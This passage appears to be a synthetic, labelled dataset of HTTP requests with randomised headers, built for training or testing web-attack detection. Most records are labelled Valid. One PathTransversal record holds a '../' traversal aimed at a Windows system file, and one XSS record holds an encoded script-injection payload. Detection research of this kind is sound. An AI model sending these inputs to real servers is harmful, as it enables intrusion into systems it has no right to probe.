Proxy-Authorization: Basic VHI2c2lkOnRsZTU2NDU=
Authorization: CtsI2 0dmEtoa=bNtev
Range: 9-,-547,201167-8758
Referer: /tsicsje.php3
TE: trailers,trailers,gzip;q=0.9
Trailer: Accept-Encoding
User-Agent: Mozilla/4.8 (Machintosh; U; PPC Mac OS X 2.5; ec-Di; rv:9.4.9) Gecko/02021102
UA-CPU: 68000
UA-Disp: 7666,0977,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1573x3760
Via: 0.5 79.201.144.251, 1.8 www.oouoe.js
Transfer-Encoding: deflate
Upgrade: shD8H/3.6, er42/9.5, hnAts9/4.3, Napco/8.1, eayeb/0.1
Warning: 726 100.194.112.153 "sOwa0" "Fri, 28 Jul 06 22:45:21 CET"
X-Forwarded-For: 77.155.203.24
X-Serial-Number: 0797621
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31068
Start - Id: 36136
class: PathTransversal
GET /ly.swf?Ms=rfsw&l7ysEPxysze=eEts&1e5tAnxaoan=eAetcioeetw&3m4dboot.ini=6204&1frruld5eaat1=2&ho=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat HTTP/1.1
Host: www.nMdlheetp.ch
Connection: keep-alive
Accept: video/quicktime, audio/*
Accept-Charset: iso-8859-9
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-age=3
Client-ip: 124.16.56.219
Cookie: l-wgetlycSn=57951211;ttp8bTsrrdnoA=%;7snph-YbPWn=nWS1KJW6YJ;melsliuorttj7Me=nzv;3ewdn4merirrf=etchr
Cookie2: $Version="150"
Date: Thu, 03 May 07 13:17:11 GMT
ETag: W/"eFAEGFJtDEm80bv04liq"
Expect: ieg5
From: rkCarar@2euo7u.cz
If-Modified-Since: Fri, 09 Feb 07 21:31:03 UTC
If-Unmodified-Since: Sat, 10 Oct 09 11:05:22 CET
If-Match: *
If-None-Match: *
If-Range: "83a8pDOo4Ep1FW0oO"
Max-Forwards: 072
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: NTLM bmF0aWFrenBiZWdoZXc4MWh5ZHlhb242cnNlblRXNHRlYW50Nmx5ZmVxOHJkYw==
Range: -535722,74763-864722,-62713
Referer: /Eoeqlbxc/lrai/Srdsy/i5cis/7awe.exe
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Hreuaeoh (9j-.F7hzR; wQQ@Bf; sH_s@Z; iKnlgYs0v; t883sQl@hG)
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 795x647
Via: 4.9 www.dNaaoe.jpeg, HTTP/0.8 www.t7rdhxNt.htm
Transfer-Encoding: gzip
Upgrade: n1LC/2.0, d6dsi/4.8
Warning: 565 www.Stne8T.html "eAh6" "Thu, 04 Dec 08 18:59:50 UTC"
X-Forwarded-For: 129.108.57.155
X-Serial-Number: 6486734154619358
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36136
Start - Id: 17028
class: Valid
GET /QQzpassthruoptxx.mdb?aoe=l&tipqhDe=lnond HTTP/1.0
Host: 222.88.76.72:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-4, iso-8859-1
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 28.189.114.107
Cookie: sn=aaR(e;qVDVMgM@9b=tsOlRrdhsiad3u;3eCjA5msalradin=eamspmon00iser;l8fer1275zalw8=yJa4itaghhGq
Cookie2: $Version="7"
Date: Wed, 07 Mar 07 06:23:37 CET
ETag: W/"RGi54Wl6KUfoXGOI"
Expect: retsau=lide4H;j5ygr7Xm
From: vdhr@pcsof.ch
If-Modified-Since: Mon, 15 Aug 05 18:56:58 UTC
If-Unmodified-Since: Thu, 23 Feb 06 15:13:04 GMT
If-Match: "d_FfbvrMZHniE8t"
If-None-Match: *
If-Range: *
Max-Forwards: 87
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: etoT lefruaR=btta3nc
Authorization: Basic bm9hZXRuZHI6Y2V2RHI4bDk=
Range: 9605-9
Referer: /agoexoe.swf
TE: trailers,deflate,trailers
Trailer: Accept
User-Agent: Mozilla/3.2 (Machintosh; U; PPC Mac OS X 4.8; 6i-es; rv:8.1.1) Gecko/97027802
UA-CPU: x86
UA-Disp: 7236,439,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 486x328
Via: 6.9 www.hlarS.htm
Transfer-Encoding: gzip
Upgrade: 2dsxif/4.8, DkeRu/7.0, doebe/0.4, thiwnu/1.1
Warning: 748 211.185.9.15 "1tesO3h" "Fri, 30 Nov 07 14:52:33 UTC"
X-Forwarded-For: 3.82.91.139
X-Serial-Number: 380344
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17028
Start - Id: 18504
class: Valid
GET /8N88Bi22_uCs4wb/n7vHKeZvRYBTo4S2BkS_/mhnM7towe5.cgi?amd=622&sOmeo=8932546 HTTP/1.0
Host: www.Vitasama.org:8
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=909
Client-ip: 74.49.148.141
Cookie: yhihUnh2ftn=nsY
Cookie2: $Version="94"
Date: Wed, 18 May 05 12:52:56 GMT
ETag: W/"ZPYVnFfO-qRYtP4sw"
Expect: 100-continue
From: eocete@3mtoie.org
If-Modified-Since: Wed, 14 Jan 09 03:22:59 GMT
If-Unmodified-Since: Thu, 16 Dec 04 19:37:21 UTC
If-Match: "rJdeI.tMoW6QNVvGE"
If-None-Match: "waN-bDJloDreFkqSRAz"
If-Range: *
Max-Forwards: 796
MIME-Version: 4.1
Pragma: uod1lrsh='semzEb'
Proxy-Authorization: Digest cnonce="3jshnz"
Authorization: nsKeoH uddsSsie=mrl5oon
Range: 91-208166
Referer: http://e6ethfs.uk/Eb1n/amYMk/iruytpa/ccano9oa.php3
TE: chunked;q=0.9,gzip,trailers
Trailer: If-Range
User-Agent: cmcpMs
UA-CPU: PowerPC
UA-Disp: 1147,7434,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 376x4288
Via: 2.1 83.243.254.68
Transfer-Encoding: identity
Upgrade: ryat/0.4, gavm/5.1, n8hana/0.1
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 100961283776
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18504
Start - Id: 22727
class: Valid
GET /peenT9gp4e5z5pttNdnl/aRa/659_0dqwFFl/BuFT5mO90RI_.shtml? HTTP/1.0
Host: 58.130.112.21
Connection: wsgrdfem
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 180.53.52.110
Cookie: uFN.vIspV=re;ne0iaiam=nnsd;nnteqoipe=471
Cookie2: $Version="658"
Date: Fri, 19 Aug 05 23:30:26 UTC
ETag: W/"Hw.-vMq@PRe4kqvba1"
Expect: tRest=aE3Funp
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Tue, 02 Nov 04 15:08:06 CET
If-Unmodified-Since: Sat, 20 Jun 09 01:40:11 UTC
If-Match: "hUV56KmzpZ7ktZWoS"
If-None-Match: *
If-Range: *
Max-Forwards: 72
MIME-Version: 2.1
Pragma: Nre=fTdrseDE
Proxy-Authorization: Digest qop=ldtEtf6e
Authorization: NTLM dVc3M2xvZXl5QWxlZDR0anRvZ2VnT25zbTduSUhvNGV0d2FiYXM=
Range: -59538
Referer: /tbjbd/itit9nd/omiu.exe
TE: chunked
Trailer: Pragma
User-Agent: 15AylL9XVS http://www.dRaRhi.fr
UA-CPU: MIPS
UA-Disp: 949,175,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0084x738
Via: 9.1 www.trun.jpeg:4690, 2.7 96.114.133.169, 5.7 238.81.86.61
Transfer-Encoding: identity
Upgrade: hodsO/0.3, eio/6.3, pir/1.9, hty/1.3, eHert0/5.2
Warning: 405 www.hedts.tiff "9neamsw9eeTeirmfn" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 46126280
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22727
Start - Id: 21779
class: Valid
GET /ivbcrladNuEeee/ejanloqUs7teoSotLeh.css?dartejdpcunA0re=deletei2naecatir&cmls493hodh=wmailem&uubogroup byzwpYx=8367&noeteifhtt=tvsol&ta=n-5nwindow.openi&ddi=0&d6oereato=tIs&3inlopenrDk4Sy=eVkv747P6Q HTTP/1.1
Host: www.3njee.de
Connection: keep-alive
Accept: audio/*, text/plain;q=0.3
Accept-Charset: iso-8859-5;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 128.24.67.230
Cookie: se=aoFXV;ebwrajxtr=brrt<:access_loginf 9h;NIbjJxmlAnR-G=06916
Cookie2: $Version="484"
Date: Sat, 03 Apr 04 20:09:06 CET
ETag: "sKTx.62m4.eRMZt"
Expect: sh2lodw
From: ehba@emH8e.com
If-Modified-Since: Fri, 13 Feb 09 14:25:25 UTC
If-Unmodified-Since: Mon, 22 Jun 09 23:49:08 UTC
If-Match: *
If-None-Match: *
If-Range: "E16tm813wRb_PvJZe"
Max-Forwards: 10
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM YlRhZ285aHJjc3VhbWJOdHN0b2hnaTl0MGJsY25ycHlkbmlBYnNzdA==
Authorization: Digest response="Fe8b0c0EF28ad1C255EC0c8b33a6Fa4e"
Range: 4-,-68,1577-
Referer: /ge6oi.php4
TE: chunked;q=0.9,deflate;q=0.6
Trailer: Cache-Control
User-Agent: 5ctesci4l (f-Vu.8; oYcULYJCw)
UA-CPU: Sparc
UA-Disp: 8956,517,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9055x3634
Via: HTTP/3.5 www.sLwd.htm:0656, ai5hli/0.0 www.hrylNSt.jpg
Transfer-Encoding: deflate
Upgrade: fed/7.1, 0aHo/0.6, eve/8.9, s92h/6.7
Warning: 112 www.tu1sEln.png "osnbT8nl" 
X-Forwarded-For: 221.81.223.145
X-Serial-Number: 2336379725238
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21779
Start - Id: 30932
class: Valid
GET /pohpastrtmsnroet/l7i70l@w7/4nneacfrd9HprdhdseT/mInnrtuop2otqbi2w/-lmeQlog7inlLt./ia1ErcqgtZihocokoe/hV.mn8SGO/h9q/arh3eheehi1r/g6.4C@CI7guMKg787/9j.jpg?aoNinbhrddiaaig=ojbte&fbetween-MadminehuB=aamwonode&Lsocneim=doewq&ornfloeyayash=ibody1processing-instruction&ReeOyoeA=mo7nftp HTTP/1.0
Host: www.sUicEe6.be
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: 7-3m0ksA;q=0.4, si7Mat-bgxswmta;q=0.0, uyMwsHbs-To7;q=0.8
Cache-Control: max-age=8360
Client-ip: 72.150.7.170
Cookie: anmtleDl4a=hOcaeepsnAwuogi;seat=ctztnp2abx;tnanCteeQnaonl=eVk
Cookie2: $Version="013"
Date: Thu, 08 Oct 09 12:50:06 UTC
ETag: W/"K6oqIvmSoqGxJe45r."
Expect: 100-continue
From: eSAnM@ahoeenfee.biz
If-Modified-Since: Sun, 25 Feb 07 02:26:34 UTC
If-Unmodified-Since: Sun, 13 Jan 08 20:15:13 CET
If-Match: *
If-None-Match: "MIjO692OJeZjApj"
If-Range: "CinlaYxVyvpOtZLNYzTn"
Max-Forwards: 211
MIME-Version: 0.3
Pragma: t='ef1'
Proxy-Authorization: Zw7ltl irs7a=wat2Do
Authorization: NTLM ZUVMNWVvU3JveGxrbHNpeXQyZXRvQ3dsY3RxbmVuMW93d2VydW90aWVo
Range: 005795-033417,-34989
Referer: http://npl1tapC.uk/sar5b5/mnrNUe/3te7da/ehwdo.mpg
TE: deflate;q=0.3
Trailer: From
User-Agent: Mozilla/4.9 (Windows; U; WinNT 6.9; tT-rc; rv:0.9.4) Gecko/06330986
UA-CPU: MIPS
UA-Disp: 0407,7003,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1031x1153
Via: HTTP/2.3 www.jio3.jpg:578, 6.8 124.210.46.68
Transfer-Encoding: deflate
Upgrade: tmb/6.0, ite/9.3, wsxo/2.3, chem/0.2, r6o/0.4
Warning: 528 150.223.116.32 "eiib2tvfathrBNuolv" 
X-Forwarded-For: 93.207.235.159
X-Serial-Number: 535265474092814212
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30932
Start - Id: 1644
class: Valid
GET /eoaotc4rwitoLoqeiu/Ee65ehy3Rcnin32eq/eHvq99MsJwMYN1Aa9m/a7w20M3x-mGB.php3? HTTP/1.1
Host: www.ftztPa9E.be
Connection: tlaiE0r
Accept: audio/*, audio/x-wav;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.4, identity, identity;q=0.5, identity;q=0.8, gzip
Accept-Language: gTsa4sfc-Bt0tsa, toorYgio-hs2wy;q=0.0
Cache-Control: no-store
Client-ip: 129.86.103.0
Cookie: nzsamise9uf=ekzpd0cBU8
Cookie2: $Version="1"
Date: Wed, 21 Dec 05 19:05:28 UTC
ETag: W/"CM2a@nx3uTJCvZZuOS"
Expect: hnxtayv
From: S6tD@nser.com
If-Modified-Since: Sun, 27 Aug 06 01:10:25 GMT
If-Unmodified-Since: Sun, 13 May 07 06:00:03 CET
If-Match: "52WCkHaBbkU4WfmTFNX"
If-None-Match: "hq-.3jTEulaUTKfLSv"
If-Range: Sat, 12 Feb 05 01:19:39 GMT
Max-Forwards: 587
MIME-Version: 7.4
Pragma: aeecxw='bebeta'
Proxy-Authorization: Digest response="bbDfe1acD0cE17D8d4AB2A7cdbb2Df5b"
Authorization: enTrr UaHh=Nosdto2
Range: 38957-
Referer: /wVhrin/Eniata/om9htu/Pteoe.exe
TE: trailers,deflate,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.5 (compatible; MSIE 8.3; Unix; ttcpb3eH; asirSuuw)
UA-CPU: 68000
UA-Disp: 6093,2247,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7605x6639
Via: 1.4 www.lvti.jpg, 1.6 www.osyrispn.js
Transfer-Encoding: yft8A; nrjsndrf=estn
Upgrade: 1neao/3.0, tome/1.5, athaw/7.1, axd3ou/1.8, Iet/4.7
Warning: 043 205.130.181.187:01570 "r9oi9t" "Thu, 28 Jul 05 10:14:18 GMT"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 65212341307
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1644
Start - Id: 11200
class: Valid
GET /gARchildsmpg/efe.mdb?ngie=5V89aPhk&tottgSs=v7XKM%40%409vD&dchttnt2l=%3Dts&qjYVi.P=5+nrl2r+&divJoPUtmp5s=dds+&iI8uon33sfeljs=6637210&ltRisbcfhd=0&esiwjueYsx=+&7BDa=-qcElictea0a%5Ca&rreendsldn=ee+ettr&ms6Z2=gzsb%5DatmnnaxcA HTTP/1.1
Host: www.kpeonkaE.uk
Connection: ieosedn
Accept: image/*;q=0.3, application/postscript
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: 5e=RFuc9un
Client-ip: 242.41.168.230
Cookie: erHpejrec=;wfgdeoens;eD5Smrae=06
Cookie2: $Version="256"
Date: Tue, 26 Aug 08 07:25:20 CET
ETag: "Sia4FFlHTJs4jsr"
Expect: e8howtr
From: oner40@a3mRaitss.com
If-Modified-Since: Sat, 03 Apr 04 21:22:46 GMT
If-Unmodified-Since: Wed, 12 Mar 08 24:18:09 CET
If-Match: "ojrgqhPNgQVN4tVa0"
If-None-Match: *
If-Range: *
Max-Forwards: 8478
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="irua"
Authorization: uantca 6t6sleri=Mue1e5z
Range: 9-8943
Referer: /H3hxarts/eexz/aeete6/nrdlst.mspx
TE: deflate;q=0.3
Trailer: Range
User-Agent: lqFFOSSw http://www.hiix.com
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 1597x0250
Via: 2.7 www.eri6rS.htm
Transfer-Encoding: qveeaz
Upgrade: soi/9.2, sgsr8/4.6
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 137.203.184.31
X-Serial-Number: 450563801661696804
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11200
Start - Id: 46969
class: XSS
GET /rl/s2m7erwwrtetmslFt/iaMy-s1Xhb@K3u/3IiroTay7eh.shtml?nwaI=uhq%3E%3Daura%27&ynaen76treP=t%2Frn&Znode3rWT=1713&lxtttnrtg=757483&ckjsystem8eoEAt=%3Cstyle+++type++%3D++%22++++text%2Fjavascript+++++%22+++%3E%5Balert++%28%27ztcrtu%27%29%3B%5D%3C%2Fstyle+%3E&tunuoUh4uu1ane=ei HTTP/1.0
Host: 98.152.157.85
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251;q=0.4, iso-8859-9, iso-2022-kr
Accept-Encoding: 
Accept-Language: amo18tEp-tA9R;q=0.1, r-msnroi
Cache-Control: no-cache
Client-ip: 62.241.33.36
Cookie: 6nsmz0wq=53;M78sf@AVRB6include=1353;lelNghssd=66607164
Date: Thu, 08 Oct 09 07:48:34 GMT
Expect: 100-continue
If-Modified-Since: Sun, 15 Oct 06 13:53:38 CET
If-Unmodified-Since: Thu, 24 Jul 08 23:12:51 GMT
If-Match: *
Max-Forwards: 2087
Proxy-Authorization: NTLM dERkdGN0N2RobWhKb2VoY2M1dXJ1ZWlpaXNXenVuYTZoMGM=
Authorization: ignyr oIhak=inleboh
Referer: /deewI/EtosinE/arohdpi/Tuti/sEemu.tar.gz
TE: trailers
User-Agent: eOMQjN@ http://www.gsanrii.it
Via: 4.2 www.l1oIjreu.css:406, 3.2 187.219.246.141, 2.0 www.osskscEi.htm
Transfer-Encoding: deflate
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 851 www.iRa0dmoc.js "OTesetongilrtiwreAm" 
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46969
Start - Id: 16969
class: Valid
GET /tKL2IaQhwaancaYG5dl/5AdITpFN7OqS4.i/Et4auh/iqoCDsxPbs/9_Si/0sonaggAs.tiff?tarme6shtSii=828&d_xterm3jZ2=zUile&toea2OEeo=bh&h9Aatsie=dsq6bjaAd&5fLnstteElo=+jo5e4kcf1&aouoeis9t1ta=Ie%28&eued1csotc=yGgcuxa-7b&f4z0jpr=99&osidgCoMaor=s HTTP/1.1
Host: www.uscOmedaf.org
Connection: 3sRtein0
Accept: application/*;q=0.4, audio/*
Accept-Charset: windows-1255;q=0.8, windows-874;q=0.6, utf-8;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: auesdt-tyi;q=0.2, e-nteruda;q=0.5, 5Fuens-yrlioz4z
Cache-Control: min-fresh=171
Client-ip: 182.248.206.167
Cookie: fZTPey=ncraminexecdts\enhyesobjectlo8;8myhfnfir=nnnhmm
Cookie2: $Version="72"
Date: Wed, 15 Oct 08 18:26:23 CET
ETag: W/"G7g8lxvTuTh7Jz_e"
Expect: 100-continue
From: ayu0@0si1euu.fr
If-Modified-Since: Wed, 14 Nov 07 19:50:11 CET
If-Unmodified-Since: Sat, 07 Nov 09 19:49:51 UTC
If-Match: "Qk7lAY2ulo1rXnNu2c"
If-None-Match: *
If-Range: *
Max-Forwards: 548
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.tajkhset.st/gasMoui/toyh/lii7/qoo0p4S/taaetS.msf
Authorization: ehtXa lsri=Omwate
Range: 26-084
Referer: http://www.dpvou.cz/Nl0p/yntnRo/eemedao.doc
TE: chunked;q=0.2,chunked;q=0.4
Trailer: Cache-Control
User-Agent: de1uiyn/7.4.6.9.4
UA-CPU: 68000
UA-Disp: 704,5793,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 366x7717
Via: 6.0 63.152.252.18
Transfer-Encoding: raerk9; eapNtzhd=bsxt
Upgrade: hole/5.0, ius/3.3, iejL/8.0
Warning: 236 www.kteDei.png "aaNzovzy59eaipao" 
X-Forwarded-For: 252.143.49.55
X-Serial-Number: 44944819
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16969
Start - Id: 13508
class: Valid
GET /0childlil8.shtml?oNoepee8ier5fti=n3oec&tfl=eCS&l7rvahsrrpyfS=71509823&sn8zTsi=53095&9qmdauEw7fswle=6&mpg=eyta%25oT+nzeo&8naipa=966685845&axuiw0ay=8130&netyQcyasnsNt=apc&mf=380560&nLyg0hw1ds0ttnw=886nnqePalf HTTP/1.0
Host: www.gptiaA.st
Connection: o10iIebE
Accept: text/plain;q=0.3, text/*;q=0.7, video/*;q=0.4
Accept-Charset: windows-1250;q=0.4, windows-1257;q=0.4, iso-2022-jp;q=0.0, euc-cn, x-mac-cyrillic;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 180.68.206.0
Cookie: bFmQ5oZ770=where9a4lo+miO;omts2eeko5uidg=0XD;xtwr0Vej1O=93571
Cookie2: $Version="839"
Date: Thu, 05 Feb 09 02:54:27 UTC
ETag: "0sMhMDv5HTSJZdA"
Expect: 100-continue
From: kdrd3o@mcnM.net
If-Modified-Since: Sun, 10 Jul 05 09:30:20 GMT
If-Unmodified-Since: Wed, 05 Oct 05 24:02:10 GMT
If-Match: *
If-None-Match: "X3eO8Ek.gFTBsk_"
If-Range: *
Max-Forwards: 1
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/uult/hNAEdi/arteht.tiff
Authorization: Basic dEVyUjU6cmRkWXY3
Range: -236366
Referer: http://www.7iitl.com/ietseks/ngngi/dwse.jsp
TE: chunked;q=0.7
Trailer: Upgrade
User-Agent: duoyraaroEnanne
UA-CPU: x86
UA-Disp: 1040,6000,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 912x6854
Via: FTP/8.0 www.osop.tiff, s7hf/4.1 www.whlG.gif
Transfer-Encoding: identity
Upgrade: anTia/3.2, i8A/9.8
Warning: 978 33.78.245.99:637 "4reogL9uehdytlttda" "Sun, 28 Aug 05 08:38:30 UTC"
X-Forwarded-For: 43.46.247.235
X-Serial-Number: 43048175021
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 13508
Start - Id: 26861
class: Valid
GET /u3/7oEXg6/geilgaaFgX/jSncmX7cg/GoWoy2pidhebeme/heh7astnrat0fsrtsn/he8nseenetk8/2window.opentlreplaceQeM/XCall23Ua/hSCnY/eO@5mtPFiqboS/iN@inVkQF19delete.png?eqo=1of&hrHeusne=6715019&abnun1einnoo=5scriptiq&icTasajyysbfspu=fuwah5o8+ot&ffhlogifrrta2=iathkoeonnsgew&hle49faz=form&HmuXdformEII=Sx8cs&nnrtsrap6q8i2ge=o%26chrasa%3Bm+h%5B&isdrtatucdnhqea=haoa%3Co+Xrurs&eae=aieEZdMlm&uoo=sEb5u&ylpn=%28o&rdef=721&u3aeiYdr2ti=9thueie7lhT099eksl HTTP/1.0
Host: 93.115.15.19:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8, euc-cn;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 46.49.11.226
Cookie: iuc=rE
Cookie2: $Version="91"
Date: Tue, 06 Jan 09 09:21:22 UTC
ETag: W/"S1vcK@ihum6725_YFZnU"
Expect: nZv2tp
From: wmesh7n@tnizghsdil.be
If-Modified-Since: Fri, 28 Mar 08 17:18:21 UTC
If-Unmodified-Since: Fri, 01 Feb 08 19:30:12 CET
If-Match: "fag7laWnoUOx53IkNAV"
If-None-Match: "bdzbmbvL9L.FvmMUHsOG"
If-Range: "7vXkNBn_MPVD8EwyH8."
Max-Forwards: 8723
MIME-Version: 8.4
Pragma: l=o4
Proxy-Authorization: Basic Z2hzamVxc286dDZ0b2FlZg==
Authorization: Digest realm
Range: -6214
Referer: /lscv/n3gmdp.jpg
TE: deflate,deflate,chunked
Trailer: Pragma
User-Agent: m7KhblKF http://www.tUh3dgs.uk
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9604x4951
Via: rhaie6/9.7 173.51.227.178
Transfer-Encoding: identity
Upgrade: Hte/6.2
Warning: 418 149.19.65.68 "AfcseewI0icr" "Sun, 10 May 09 17:21:33 GMT"
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 68664107203
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26861
Start - Id: 13298
class: Valid
GET /hyXRJ2YiIlNtN/jPHD4Kz9R0CW/stiacgelueNnhtgrinj/iwAHUKg_viVfk3NRLnX/Py8IwBchildq@qtmpo6/l-6Tde/ygea.tiff?vdwtqn=mXu%3Btbodyidsef%7Ce-bule&atdsry=amhMctnl&n3sliba=tzOhemnrdeTolJ1&irgtbclorl=1%29e&dsSln=psyr&l1es3rdhEftr=n%5C&5YlsqadminlO8BEinsertH=0107285&njs=Ut+iR40de3Tdivos2&fra1skwtE=%3Eop&maai=oot&d0y6yr8esrg=s4s6XD0kJvL&Gegjho4a8=%3Eto HTTP/1.0
Host: 62.76.55.22
Connection: keep-alive
Accept: text/plain
Accept-Charset: macintosh
Accept-Encoding: *
Accept-Language: c9-EdEh;q=0.5, ieissy-zzsh7
Cache-Control: min-fresh=47847
Client-ip: 111.166.166.251
Cookie: t7tAsrwb=68335;gCm=8160;KqARX_NOphtaccesTR=ahosmtm
Cookie2: $Version="04"
Date: Mon, 22 Jun 09 20:04:28 CET
ETag: W/"cvSdlZqUOb@ANoNxDn"
Expect: ceeshs=oudnsa;Aeiis
From: vis1fi@seiyZ1s.uk
If-Modified-Since: Sun, 26 Apr 09 10:37:06 CET
If-Unmodified-Since: Mon, 07 Feb 05 13:29:36 CET
If-Match: *
If-None-Match: "h3p2f8hH86oceS_WZ1yF"
If-Range: "J7yYVjyC0okp9qgdR7iu"
Max-Forwards: 3968
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM eXI4aG90dHQ3cDRzTm4xYW9ub3ljaGFzbzB0c2t0OWVFdVRPZWU=
Authorization: ecge nd9lsge=yssdv
Range: 91-,95-043440
Referer: http://www.nhyoz.fr/teceifTi/bsanc7/TO4mOIt/utmhUsnr.pdf
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/7.9 (Windows; U; Win98 1.7; rt-aj; rv:3.4.8) Gecko/74629805
UA-CPU: Sparc
UA-Disp: 5979,9503,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1944x150
Via: 7.0 90.60.243.33, FTP/3.9 170.65.251.78
Transfer-Encoding: lleoya; 2IlOe=adiwIu
Upgrade: b0t/3.8, aods/6.0, si1/3.6
Warning: 485 www.7clebMi.htm "1o2DuenneaIjtneA" "Mon, 12 Mar 07 02:44:32 CET"
X-Forwarded-For: 152.52.206.24
X-Serial-Number: 2177345757
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13298
Start - Id: 15792
class: Valid
GET /a2fCLbNRmVU/eiahlTrnC/nq6j8GDOoUM10QVd.bin? HTTP/1.1
Host: www.oEiraeouca.org
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: emtfuldb='noehee'
Client-ip: 229.112.76.63
Cookie: 6h=cau\i%eddstl;lrrt=o;WlXLFsEall=vp\d21n nd\4div;tvzebv=cZ@;ltofor=126;bhsAi0iH=ibEnVoead
Cookie2: $Version="392"
Date: Sat, 13 May 06 14:04:22 UTC
ETag: W/"4h61cso@7Kr_3au@Toa-"
Expect: 100-continue
From: enag0ez@aejbBetotm.com
If-Modified-Since: Sun, 11 Jan 04 04:50:34 UTC
If-Unmodified-Since: Sat, 07 Jun 08 24:51:14 GMT
If-Match: "-xQ4hdVrJX4Ue44."
If-None-Match: "VBDPZGmavrRHkCiC3PfP"
If-Range: Wed, 21 Feb 07 07:49:03 UTC
Max-Forwards: 57
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest uri=http://emrrs.uk/eCsa/atRe/Sh9e/tejtAlw.ace
Authorization: Basic YXRlZXQ6bGxpc3Y1
Range: 4-1452
Referer: /xjcSl/eoelbt/mmTeent.wmn
TE: deflate;q=0.2,chunked,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.3 (Windows; U; Win 9x 4.4; rw-fd; rv:1.8.3) Gecko/08366144
UA-CPU: StrongARM
UA-Disp: 3907,1004,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9100x614
Via: FTP/3.6 190.248.141.136:564, FTP/9.9 www.Etaenf.tiff, FTP/2.2 www.bmiC5.jpg:6
Transfer-Encoding: gzip
